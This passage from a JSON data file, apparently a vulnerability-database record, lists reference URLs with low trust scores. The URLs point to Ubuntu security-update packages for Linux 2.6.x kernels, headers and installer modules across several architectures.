        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ipv6-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/input-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/mouse-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-server_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-fsl-imx51/linux-fsl-imx51_2.6.31-108.21.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/xfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ipv6-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/socket-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-sparc64_2.6.31-19.56_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/sata-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/md-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/md-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-image-2.6.31-19-powerpc64-smp_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-pcmcia-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/universe/l/linux/linux-image-2.6.24-27-openvz_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nic-usb-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/md-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/irda-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ide-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.31-19-generic_2.6.31-19.56_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-core-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-storage-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nfs-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ext2-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/serial-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/nfs-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/socket-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/input-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/crc-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/firewire-core-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-pcmcia-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/firewire-core-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/reiserfs-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pata-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ipv6-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/crypto-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/irda-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc64-smp-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/mouse-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/message-modules-2.6.31-19-generic-di_2.6.31-19.56_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-usb-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-sparc64-smp_2.6.15-55.82_sparc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-headers-2.6.15-55-686_2.6.15-55.82_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-source-2.6.15_2.6.15-55.82_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/linux-image-2.6.15-55-amd64-generic_2.6.15-55.82_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.31-19.56.dsc"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.31-19-generic-di_2.6.31-19.56_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/plip-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/input-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-kernel-devel_2.6.24-27.65_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/cdrom-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/serial-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/fat-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fb-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-core-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/block-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pata-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/ppp-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/parport-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fs-secondary-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/acpi-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/linux-headers-2.6.31-19-powerpc_2.6.31-19.56_powerpc.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nfs-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/usb-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-usb-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.24-27-386_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.31-19-powerpc-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/parport-modules-2.6.24-27-386-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/scsi-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-2.6.24-27-generic_2.6.24-27.65_i386.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/ppp-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/plip-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/usb-storage-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.28-18_2.6.28-18.59_all.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/irda-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/kernel-image-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/scsi-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.28-18-lpia-di_2.6.28-18.59_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/storage-core-modules-2.6.31-19-sparc64-di_2.6.31-19.56_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/floppy-modules-2.6.28-18-generic-di_2.6.28-18.59_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/sata-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/message-modules-2.6.24-27-sparc64-di_2.6.24-27.65_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.28-18-generic-di_2.6.28-18.59_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/storage-core-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/sata-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.31-19-powerpc64-smp-di_2.6.31-19.56_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/socket-modules-2.6.15-55-powerpc-di_2.6.15-55.82_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/fat-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-pcmcia-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/floppy-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/pcmcia-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fs-secondary-modules-2.6.24-27-generic-di_2.6.24-27.65_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-image-debug-2.6.24-27-generic_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/crypto-modules-2.6.31-19-lpia-di_2.6.31-19.56_lpia.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/loop-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/nic-shared-modules-2.6.24-27-powerpc-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/fat-modules-2.6.24-27-generic-di_2.6.24-27.65_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/scsi-core-modules-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/nic-shared-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux-libc-dev_2.6.24-27.65_amd64.deb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/linux_2.6.24-27.65.diff.gz"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/parport-modules-2.6.15-55-amd64-generic-di_2.6.15-55.82_amd64.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/plip-modules-2.6.15-55-386-di_2.6.15-55.82_i386.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.15/kernel-image-2.6.15-55-sparc64-di_2.6.15-55.82_sparc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ide-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://ports.ubuntu.com/pool/main/l/linux/ppp-modules-2.6.24-27-powerpc64-smp-di_2.6.24-27.65_powerpc.udeb"
      },
      {
        "trust": 0.1,
        "url": "http://security.ubuntu.com/ubuntu/pool/main/l/linux/pcmcia-storage-modules-2.6.27-17-generic-di_2.6.27-17.45_amd64.udeb"
      },
      {
